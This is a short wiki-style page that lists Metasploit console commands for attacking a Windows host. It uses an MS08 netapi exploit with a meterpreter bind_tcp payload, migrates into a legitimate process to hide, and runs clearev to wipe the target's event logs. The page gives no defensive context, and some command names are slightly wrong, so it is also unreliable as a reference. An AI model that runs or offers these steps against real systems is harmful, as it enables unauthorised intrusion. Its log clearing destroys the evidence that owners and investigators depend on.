Computing | Computer Security | Linux Security | Industrial Control Systems Security | Penetration Testing | Exploitation | Social Engineering | Metasploit

Metasploit & Armitage

Some commands to operate metasploit:

search netapi

use exploit ms08

set payload window/meterpreter/bind_tcp

show options

set RHOST target_ip

exploit

meterpreter> getpid

ps

select any legitimate process and its PID

migrate PID

?
finally clear all logs on the target

clearev

Tools - Reading List

http:///wiki/?metasploit

28nov16   admin